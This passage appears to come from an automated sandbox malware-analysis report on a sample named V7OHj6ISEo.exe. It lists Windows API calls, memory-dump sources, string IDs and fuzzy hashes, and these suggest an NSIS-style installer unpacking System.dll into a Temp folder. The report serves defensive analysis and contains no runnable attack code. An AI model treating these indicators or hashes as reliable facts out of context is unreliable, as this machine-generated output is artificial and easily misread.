                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Char$Next$Prev
                                                                                                            • String ID: "C:\Users\user\Desktop\V7OHj6ISEo.exe"$*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
                                                                                                            • API String ID: 589700163-1004474410
                                                                                                            • Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                            • Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
                                                                                                            • Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                            • Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD
                                                                                                            APIs
                                                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 004043E3
                                                                                                            • GetSysColor.USER32(00000000), ref: 00404421
                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 0040442D
                                                                                                            • SetBkMode.GDI32(?,?), ref: 00404439
                                                                                                            • GetSysColor.USER32(?), ref: 0040444C
                                                                                                            • SetBkColor.GDI32(?,?), ref: 0040445C
                                                                                                            • DeleteObject.GDI32(?), ref: 00404476
                                                                                                            • CreateBrushIndirect.GDI32(?), ref: 00404480
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2320649405-0
                                                                                                            • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                            • Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
                                                                                                            • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                            • Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                            • lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                            • lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                            • SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                            • String ID:
                                                                                                            • API String ID: 2531174081-0
                                                                                                            • Opcode ID: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
                                                                                                            • Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
                                                                                                            • Opcode Fuzzy Hash: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
                                                                                                            • Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8
                                                                                                            APIs
                                                                                                            • DestroyWindow.USER32(00000000,00000000), ref: 00402EA9
                                                                                                            • GetTickCount.KERNEL32 ref: 00402EC7
                                                                                                            • wsprintfW.USER32 ref: 00402EF5
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                              • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                              • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
                                                                                                            • ShowWindow.USER32(00000000,00000005), ref: 00402F27
                                                                                                              • Part of subcall function 00402E72: MulDiv.KERNEL32(00000000,00000064,00002A63), ref: 00402E87
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                            • String ID: ... %d%%
                                                                                                            • API String ID: 722711167-2449383134
                                                                                                            • Opcode ID: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                            • Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
                                                                                                            • Opcode Fuzzy Hash: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                            • Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
                                                                                                            • GetMessagePos.USER32 ref: 00404D3D
                                                                                                            • ScreenToClient.USER32(?,?), ref: 00404D57
                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
                                                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$Send$ClientScreen
                                                                                                            • String ID: f
                                                                                                            • API String ID: 41195575-1993550816
                                                                                                            • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                            • Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
                                                                                                            • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                            • Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4
                                                                                                            APIs
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,755621EC,?,00000808), ref: 75561635
                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,755621EC,?,00000808), ref: 7556163C
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,755621EC,?,00000808), ref: 75561650
                                                                                                            • GetProcAddress.KERNEL32(!Vu,00000000), ref: 75561657
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 75561660
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1884142121.0000000075561000.00000020.00000001.01000000.00000004.sdmp, Offset: 75560000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1884110487.0000000075560000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1884190450.0000000075564000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1884228003.0000000075566000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_75560000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                            • String ID: !Vu
                                                                                                            • API String ID: 1148316912-3730723520
                                                                                                            • Opcode ID: ea5b77295a3158fb19089368d03e52fa2814892edeac523a00b89d7b66fe7c03
                                                                                                            • Instruction ID: 199b84348925ef1a285711d6d68ba87886187f57e72ab713a2ea0b3c1f828a27
                                                                                                            • Opcode Fuzzy Hash: ea5b77295a3158fb19089368d03e52fa2814892edeac523a00b89d7b66fe7c03
                                                                                                            • Instruction Fuzzy Hash: 41F01273516178BBD62016EB8C4CD9B7E9CDF8B6F5B110212F61896190CA615C01D7F1
                                                                                                            APIs
                                                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                                                            • wsprintfW.USER32 ref: 00402E45
                                                                                                            • SetWindowTextW.USER32(?,?), ref: 00402E55
                                                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                                            • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                            • API String ID: 1451636040-1158693248
                                                                                                            • Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                            • Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
                                                                                                            • Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                            • Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99
                                                                                                            APIs
                                                                                                              • Part of subcall function 7556121B: GlobalAlloc.KERNELBASE(00000040,?,7556123B,?,755612DF,00000019,755611BE,-000000A0), ref: 75561225
                                                                                                            • GlobalFree.KERNEL32(?), ref: 75562657
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 7556268C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1884142121.0000000075561000.00000020.00000001.01000000.00000004.sdmp, Offset: 75560000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1884110487.0000000075560000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1884190450.0000000075564000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1884228003.0000000075566000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_75560000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$Free$Alloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 1780285237-0
                                                                                                            • Opcode ID: f2bff57402571915155fabec588338ea8ab060d89aaeb7bfc22d9665287acd7e
                                                                                                            • Instruction ID: aeec48cc782e802233461963228944115eac4f043049924af2be26a5b3bdcfbd
                                                                                                            • Opcode Fuzzy Hash: f2bff57402571915155fabec588338ea8ab060d89aaeb7bfc22d9665287acd7e
                                                                                                            • Instruction Fuzzy Hash: B931D0326141C1EFCB16DF59C8D4D2A77B6FB85F50320462EF9428B264CF32A855CBA2
                                                                                                            APIs
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                            • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 2667972263-0
                                                                                                            • Opcode ID: ad54be54d1b33f2c3e643305ac3600c2e6c22dcacd93b56e136af0bf18fa41fc
                                                                                                            • Instruction ID: fa73a2a76dd28b4b8719808dd60f9f08d060129827b0ffc87b4efdc8f5ae5e12
                                                                                                            • Opcode Fuzzy Hash: ad54be54d1b33f2c3e643305ac3600c2e6c22dcacd93b56e136af0bf18fa41fc
                                                                                                            • Instruction Fuzzy Hash: 3D21BFB1D00124BBCF116FA5DE48D9E7E79EF09364F10023AF9607A2E1CB794D418B98
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                            • wsprintfW.USER32 ref: 00404CB6
                                                                                                            • SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                                            • String ID: %u.%u%s%s$(7B
                                                                                                            • API String ID: 3540041739-1320723960
                                                                                                            • Opcode ID: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
                                                                                                            • Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
                                                                                                            • Opcode Fuzzy Hash: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
                                                                                                            • Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8
                                                                                                            APIs
                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user~1\AppData\Local\Temp\nscEDE4.tmp,000000FF,C:\Users\user~1\AppData\Local\Temp\nscEDE4.tmp\System.dll,00000400,?,?,00000021), ref: 004025E8
                                                                                                            • lstrlenA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nscEDE4.tmp\System.dll,?,?,C:\Users\user~1\AppData\Local\Temp\nscEDE4.tmp,000000FF,C:\Users\user~1\AppData\Local\Temp\nscEDE4.tmp\System.dll,00000400,?,?,00000021), ref: 004025F3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWidelstrlen
                                                                                                            • String ID: C:\Users\user~1\AppData\Local\Temp\nscEDE4.tmp$C:\Users\user~1\AppData\Local\Temp\nscEDE4.tmp\System.dll
                                                                                                            • API String ID: 3109718747-3698289660
                                                                                                            • Opcode ID: 2504939cc2fa207c3b55af63f84819462ffbd17dbd09f8919900b39cf6f986df
                                                                                                            • Instruction ID: c13fbae436403556d6c48d38c5ac6db5007ae9437622b5a65b164b2cac9ab4a1
                                                                                                            • Opcode Fuzzy Hash: 2504939cc2fa207c3b55af63f84819462ffbd17dbd09f8919900b39cf6f986df
                                                                                                            • Instruction Fuzzy Hash: FB110B72A00301BADB106BB18E8999F7664AF44359F20443BF502F21D0D9FC89416B5E
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1884142121.0000000075561000.00000020.00000001.01000000.00000004.sdmp, Offset: 75560000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1884110487.0000000075560000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1884190450.0000000075564000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1884228003.0000000075566000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_75560000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeGlobal
                                                                                                            • String ID:
                                                                                                            • API String ID: 2979337801-0
                                                                                                            • Opcode ID: 2eca508df42f53a49f4b56a7e487b997e4a47f553a2bb8eb5274fd7b666f0a48
                                                                                                            • Instruction ID: e1c2174a5a936ccf55fdbf64cef850ce10f6e3517090b6af066d005a06d34eda
                                                                                                            • Opcode Fuzzy Hash: 2eca508df42f53a49f4b56a7e487b997e4a47f553a2bb8eb5274fd7b666f0a48
                                                                                                            • Instruction Fuzzy Hash: 4D51D83AE042D59BCB02DFA4C6409BDB7B7FB84F90F00465AD807A3A54DB71AE8187D1
                                                                                                            APIs
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 755624D6
                                                                                                              • Part of subcall function 7556122C: lstrcpynW.KERNEL32(00000000,?,755612DF,00000019,755611BE,-000000A0), ref: 7556123C
                                                                                                            • GlobalAlloc.KERNEL32(00000040), ref: 7556245C
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 75562477
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1884142121.0000000075561000.00000020.00000001.01000000.00000004.sdmp, Offset: 75560000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1884110487.0000000075560000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1884190450.0000000075564000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1884228003.0000000075566000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_75560000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                            • String ID:
                                                                                                            • API String ID: 4216380887-0
                                                                                                            • Opcode ID: 5022a3386f5e18fea557ada7228944891eae1535778b184f4ff8fbe65a586e5e
                                                                                                            • Instruction ID: 68420d1476230b8dd7614a1fba92d854cc5c6abb2761645b74e375f7afb2e4e9
                                                                                                            • Opcode Fuzzy Hash: 5022a3386f5e18fea557ada7228944891eae1535778b184f4ff8fbe65a586e5e
                                                                                                            • Instruction Fuzzy Hash: 7041B2B1608385DFC315EF65D844A2677B8FB98B21F104D1EF8478B581EB72A484CBA2
                                                                                                            APIs
                                                                                                            • GetDC.USER32(?), ref: 00401DBC
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                            • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                            • String ID:
                                                                                                            • API String ID: 3808545654-0
                                                                                                            • Opcode ID: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
                                                                                                            • Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
                                                                                                            • Opcode Fuzzy Hash: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
                                                                                                            • Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,?), ref: 00401D63
